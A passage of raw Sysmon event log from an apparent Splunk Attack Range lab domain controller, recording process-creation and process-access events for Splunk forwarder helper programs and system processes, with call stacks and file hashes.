Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018535Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:45.388{59A5CD1D-9505-6005-4E05-00000000A301}6744C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018559Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:46.934{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9506-6005-5005-00000000A301}6632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018558Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:46.934{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018557Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:46.934{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018556Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:46.934{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018555Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:46.934{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018554Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:46.934{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9506-6005-5005-00000000A301}6632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018553Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:46.934{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9506-6005-5005-00000000A301}6632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018552Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:46.935{59A5CD1D-9506-6005-5005-00000000A301}6632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018551Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:46.059{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9506-6005-4F05-00000000A301}6008C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018550Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:46.059{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018549Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:46.059{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018548Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:46.059{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018547Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:46.059{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018546Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:46.059{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9506-6005-4F05-00000000A301}6008C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018545Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:46.059{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9506-6005-4F05-00000000A301}6008C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018544Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:46.060{59A5CD1D-9506-6005-4F05-00000000A301}6008C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018560Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:47.095{59A5CD1D-9506-6005-5005-00000000A301}66325536C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018578Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:48.856{59A5CD1D-9508-6005-5205-00000000A301}42402512C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018577Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:48.701{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9508-6005-5205-00000000A301}4240C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018576Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:48.701{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018575Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:48.701{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018574Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:48.701{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018573Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:48.701{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018572Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:48.701{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9508-6005-5205-00000000A301}4240C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018571Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:48.701{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9508-6005-5205-00000000A301}4240C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018570Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:48.701{59A5CD1D-9508-6005-5205-00000000A301}4240C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018569Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:48.184{59A5CD1D-9508-6005-5105-00000000A301}37966388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program 